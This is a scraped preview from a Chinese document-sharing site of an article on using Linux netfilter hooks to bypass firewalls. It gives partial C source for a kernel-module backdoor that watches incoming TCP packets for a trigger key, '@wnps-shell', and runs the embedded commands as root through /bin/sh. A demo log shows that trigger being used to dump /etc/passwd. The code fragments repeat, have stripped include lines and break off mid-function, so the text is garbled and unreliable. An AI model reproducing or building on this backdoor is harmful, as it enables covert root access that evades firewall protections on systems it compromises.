欢迎来到天天文库
浏览记录
ID:19487132
大小:34.00 KB
页数:17页
时间:2018-10-02
《利用netfilter来突破防火墙》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库。
1、利用netfilter来突破防火墙前几天看了rwrk这个rk的demo,它就是利用netfilterhook住了进入主机的数据包,hook点是NF_IP_PRE_ROUTING,因此可以在进入iptables之前提前实现数据包的过滤。在这个hook点上作文章就比较多了,可以实现防火墙,嗅探器,当然也可以用来触发回连后门,wnps就是这么来作的,因此不管主机防火墙作的规则如何变态,都有机会穿透它。下面这个demo用来演示分析tcp包的内容,分析出里面的命令,然后去执行它,有点类似以前的icmp,ip包后门,只不过这些都在内核来完成,功能更强大。demo在ubuntu8.10+2.6.28上测试
2、成功。wzt@wzt-laptop:~$nc-vvlocalhost22localhost[127.0.0.1]22(ssh)openSSH-2.0-OpenSSH_5.1p1Debian-3ubuntu1@wnps-shell:cat/etc/passwd>/home/wzt/pass.logProtocolmismatch.sent49,rcvd58demsg:[957.255416]kexecteststart...[1029.692964]hook:function:hook_func-L125:gotthetcpkey.[1029.692981]hook:function:hook
3、_func-L127:cat/etc/passwd>/home/wzt/pass.log[1029.692985]wzt@wzt-laptop:~$ls-lhtpass.log-rw-r--r--1rootroot1.7K2009-06-0408:08pass.log+---------------------------------------------------------------------+#include#include#include#include4、>#include#include#include#include#include#include#include#include#include#include#include#include#include5、tfilter_ipv4.h>#include#include#include#include#defineHOOK_DEBUG#ifdefHOOK_DEBUG#defineDbgPrint(format,args...)printk("hook:function:%s-L%d:"format,__FUNCTION__,__LINE__,##args);#else#defineDbgPrint(format,args...)do{}while(0);#endif#defineTCP6、_SHELL_KEY"@wnps-shell"#definePORT_NUM6#defineIP_NUM20#defineBUFF_NUM512MODULE_LICENSE("GPL");MODULE_AUTHOR("wzt");structexec_work{structwork_structwork;char*cmd;};staticstructnf_hook_opsnfho;intkexec_user_app(void*data){structexec_work*work=data;intret;char*argv[]={"/bin/sh","-c",work->cmd,NULL};c7、har*envp[]={"HOME=/","TERM=linux","PATH=/sbin:/usr/sbin:/bin:/usr/bin",NULL};ret=call_usermodehelper(argv[0],argv,envp,1);returnret;}intexecute_user_command(char*cmd){structexec_work*exec_work;exec_work=kma
4、>#include#include#include#include#include#include#include#include#include#include#include#include#include5、tfilter_ipv4.h>#include#include#include#include#defineHOOK_DEBUG#ifdefHOOK_DEBUG#defineDbgPrint(format,args...)printk("hook:function:%s-L%d:"format,__FUNCTION__,__LINE__,##args);#else#defineDbgPrint(format,args...)do{}while(0);#endif#defineTCP6、_SHELL_KEY"@wnps-shell"#definePORT_NUM6#defineIP_NUM20#defineBUFF_NUM512MODULE_LICENSE("GPL");MODULE_AUTHOR("wzt");structexec_work{structwork_structwork;char*cmd;};staticstructnf_hook_opsnfho;intkexec_user_app(void*data){structexec_work*work=data;intret;char*argv[]={"/bin/sh","-c",work->cmd,NULL};c7、har*envp[]={"HOME=/","TERM=linux","PATH=/sbin:/usr/sbin:/bin:/usr/bin",NULL};ret=call_usermodehelper(argv[0],argv,envp,1);returnret;}intexecute_user_command(char*cmd){structexec_work*exec_work;exec_work=kma
5、tfilter_ipv4.h>#include#include#include#include#defineHOOK_DEBUG#ifdefHOOK_DEBUG#defineDbgPrint(format,args...)printk("hook:function:%s-L%d:"format,__FUNCTION__,__LINE__,##args);#else#defineDbgPrint(format,args...)do{}while(0);#endif#defineTCP
6、_SHELL_KEY"@wnps-shell"#definePORT_NUM6#defineIP_NUM20#defineBUFF_NUM512MODULE_LICENSE("GPL");MODULE_AUTHOR("wzt");structexec_work{structwork_structwork;char*cmd;};staticstructnf_hook_opsnfho;intkexec_user_app(void*data){structexec_work*work=data;intret;char*argv[]={"/bin/sh","-c",work->cmd,NULL};c
7、har*envp[]={"HOME=/","TERM=linux","PATH=/sbin:/usr/sbin:/bin:/usr/bin",NULL};ret=call_usermodehelper(argv[0],argv,envp,1);returnret;}intexecute_user_command(char*cmd){structexec_work*exec_work;exec_work=kma
此文档下载收益归作者所有